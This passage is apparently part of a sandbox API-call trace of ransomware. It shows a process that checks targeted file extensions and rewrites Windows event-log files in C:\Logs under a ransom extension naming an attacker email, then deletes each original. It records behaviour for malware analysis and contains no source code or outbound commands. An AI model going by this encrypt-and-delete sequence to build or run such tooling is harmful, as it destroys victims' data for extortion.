(lpString1=".evtx", lpString2=".bat") returned 1 [0064.673] lstrlenW (lpString="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 59 [0064.673] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0064.674] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0064.674] CloseHandle (hObject=0x32c) returned 1 [0064.674] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx")) returned 0x20 [0064.674] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.674] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0064.674] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.674] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.674] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0064.675] GetLastError () returned 0x0 [0064.675] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.228] WriteFile (in: hFile=0x39c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.230] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.230] WriteFile (in: hFile=0x39c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x14a, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x14a, lpOverlapped=0x0) returned 1 [0065.230] SetEndOfFile (hFile=0x39c) returned 1 [0065.803] CloseHandle (hObject=0x39c) returned 1 [0065.823] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.839] SetEndOfFile (hFile=0x32c) returned 1 [0065.840] CloseHandle (hObject=0x32c) returned 1 [0065.841] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.841] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx")) returned 1 [0065.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.842] lstrlenW (lpString=".doc") returned 4 [0065.842] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString=".docx") returned 5 [0065.842] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.842] lstrlenW (lpString=".pdf") returned 4 [0065.842] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString=".xls") returned 4 [0065.842] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString=".xlsx") returned 5 [0065.842] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.842] lstrlenW (lpString=".ppt") returned 4 [0065.842] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.842] lstrlenW (lpString=".zip") returned 4 [0065.842] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString=".rar") returned 4 [0065.842] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString=".bz2") returned 4 [0065.842] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString=".7z") returned 3 [0065.842] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.842] lstrlenW (lpString=".dbf") returned 4 [0065.842] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.842] lstrlenW (lpString=".1cd") returned 4 [0065.842] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.842] lstrlenW (lpString=".jpg") returned 4 [0065.842] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.843] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.843] lstrlenW (lpString=".doc") returned 4 [0065.843] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString=".docx") returned 5 [0065.843] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.843] lstrlenW (lpString=".pdf") returned 4 [0065.843] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString=".xls") returned 4 [0065.843] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString=".xlsx") returned 5 [0065.843] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.843] lstrlenW (lpString=".ppt") returned 4 [0065.843] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.843] lstrlenW (lpString=".zip") returned 4 [0065.843] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString=".rar") returned 4 [0065.843] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString=".bz2") returned 4 [0065.843] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString=".7z") returned 3 [0065.843] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.843] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.843] lstrlenW (lpString=".dbf") returned 4 [0065.843] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.843] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.843] lstrlenW (lpString=".1cd") returned 4 [0065.843] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.844] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0065.844] lstrlenW (lpString=".jpg") returned 4 [0065.844] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.844] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.844] lstrlenW (lpString="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 56 [0065.844] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0065.844] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0065.844] CloseHandle (hObject=0x32c) returned 1 [0065.844] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx")) returned 0x20 [0065.844] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.844] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0065.845] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.845] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.845] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0065.846] GetLastError () returned 0x0 [0065.846] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.848] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.850] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.850] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x144, lpOverlapped=0x0) returned 1 [0065.850] SetEndOfFile (hFile=0x394) returned 1 [0065.850] CloseHandle (hObject=0x394) returned 1 [0065.852] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.852] SetEndOfFile (hFile=0x32c) returned 1 [0065.853] CloseHandle (hObject=0x32c) returned 1 [0065.853] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.853] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx")) returned 1 [0065.854] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.854] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.854] lstrlenW (lpString=".doc") returned 4 [0065.854] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString=".docx") returned 5 [0065.854] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.854] lstrlenW (lpString=".pdf") returned 4 [0065.854] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString=".xls") returned 4 [0065.854] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString=".xlsx") returned 5 [0065.854] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.854] lstrlenW (lpString=".ppt") returned 4 [0065.854] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.854] lstrlenW (lpString=".zip") returned 4 [0065.854] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString=".rar") returned 4 [0065.854] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString=".bz2") returned 4 [0065.854] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString=".7z") returned 3 [0065.854] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.854] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.854] lstrlenW (lpString=".dbf") returned 4 [0065.854] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.854] lstrlenW (lpString=".1cd") returned 4 [0065.854] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.854] lstrlenW (lpString=".jpg") returned 4 [0065.854] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.854] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.854] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.855] lstrlenW (lpString=".doc") returned 4 [0065.855] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString=".docx") returned 5 [0065.855] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.855] lstrlenW (lpString=".pdf") returned 4 [0065.855] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString=".xls") returned 4 [0065.855] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString=".xlsx") returned 5 [0065.855] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.855] lstrlenW (lpString=".ppt") returned 4 [0065.855] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.855] lstrlenW (lpString=".zip") returned 4 [0065.855] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString=".rar") returned 4 [0065.855] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString=".bz2") returned 4 [0065.855] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString=".7z") returned 3 [0065.855] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.855] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.855] lstrlenW (lpString=".dbf") returned 4 [0065.855] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.855] lstrlenW (lpString=".1cd") returned 4 [0065.855] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.855] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0065.855] lstrlenW (lpString=".jpg") returned 4 [0065.855] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.855] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.855] lstrlenW (lpString="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 53 [0065.856] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0065.856] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0065.856] CloseHandle (hObject=0x32c) returned 1 [0065.856] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx")) returned 0x20 [0065.856] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.856] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0065.856] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.856] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.856] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0065.857] GetLastError () returned 0x0 [0065.857] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.859] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.860] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.860] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x13e, lpOverlapped=0x0) returned 1 [0065.860] SetEndOfFile (hFile=0x394) returned 1 [0065.861] CloseHandle (hObject=0x394) returned 1 [0065.862] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.862] SetEndOfFile (hFile=0x32c) returned 1 [0065.863] CloseHandle (hObject=0x32c) returned 1 [0065.863] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.864] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx")) returned 1 [0065.864] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.864] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.864] lstrlenW (lpString=".doc") returned 4 [0065.864] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.864] lstrlenW (lpString=".docx") returned 5 [0065.864] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.864] lstrlenW (lpString=".pdf") returned 4 [0065.864] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.864] lstrlenW (lpString=".xls") returned 4 [0065.864] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.864] lstrlenW (lpString=".xlsx") returned 5 [0065.864] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.864] lstrlenW (lpString=".ppt") returned 4 [0065.864] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.864] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.864] lstrlenW (lpString=".zip") returned 4 [0065.864] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.864] lstrlenW (lpString=".rar") returned 4 [0065.864] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.864] lstrlenW (lpString=".bz2") returned 4 [0065.864] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.864] lstrlenW (lpString=".7z") returned 3 [0065.864] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.865] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.865] lstrlenW (lpString=".dbf") returned 4 [0065.865] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.865] lstrlenW (lpString=".1cd") returned 4 [0065.865] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.865] lstrlenW (lpString=".jpg") returned 4 [0065.865] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.865] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.865] lstrlenW (lpString=".doc") returned 4 [0065.865] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString=".docx") returned 5 [0065.865] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.865] lstrlenW (lpString=".pdf") returned 4 [0065.865] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString=".xls") returned 4 [0065.865] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString=".xlsx") returned 5 [0065.865] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.865] lstrlenW (lpString=".ppt") returned 4 [0065.865] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.865] lstrlenW (lpString=".zip") returned 4 [0065.865] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString=".rar") returned 4 [0065.865] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString=".bz2") returned 4 [0065.865] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString=".7z") returned 3 [0065.865] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.865] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.865] lstrlenW (lpString=".dbf") returned 4 [0065.865] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.865] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.866] lstrlenW (lpString=".1cd") returned 4 [0065.866] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.866] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0065.866] lstrlenW (lpString=".jpg") returned 4 [0065.866] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.866] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.866] lstrlenW (lpString="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 51 [0065.866] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0065.866] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0065.866] CloseHandle (hObject=0x32c) returned 1 [0065.866] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx")) returned 0x20 [0065.866] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.866] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 